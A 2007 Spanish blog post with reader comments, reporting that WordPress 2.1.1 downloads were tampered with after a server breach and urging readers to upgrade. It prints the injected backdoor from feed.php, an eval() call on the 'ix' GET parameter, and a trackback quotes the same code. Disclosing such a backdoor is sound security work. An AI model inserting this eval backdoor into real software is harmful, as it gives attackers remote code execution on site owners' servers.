Actualización de Seguridad de Wordpress
Por: alex | 2 Marzo 2007 | Ver comentarios |
Hace unas cuantas horas me enteré de la liberación de una nueva versión de Wordpress, que según el blog oficial, un cracker obtuvo acceso a uno de los servidores de wordpress.org y puso código malicioso en las versiones descargables de la versión 2.1.1.
Casualmente descargué esta versión vulnerable de Wordpress, para realizar las pruebas -y algunas correcciones- de la nueva versión del plugin PopStats. El código insertado en la versión que tengo a la mano es la siguiente (feed.php):
function comment_text_phpfilter($filterdata) {
eval($filterdata);
}
...
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }Como se puede apreciar, el código insertado es bastante peligroso puesto que permite la ejecución de código arbitrario.
Esta nueva versión, también corrige otro problemas de seguridad:
Es recomendable que actualizen cuanto antes vuestra versión de Wordpress para evitarse malos ratos.
emarts
3 de Marzo de 2007, 12:10:16 am
Mañana, Wordpress 2.1.3… pasado… Wordpress 2.1.4…
Un lugar en el mundo… » Blog Archive » Actualización de seguridad para Wordpress 2.1.1
3 de Marzo de 2007, 03:09:28 am
[…] los curiosos, en buayacorp nos muestran el código introducido en el fichero feed.php: function comment_text_phpfilter($filterdata) { eval($filterdata); […]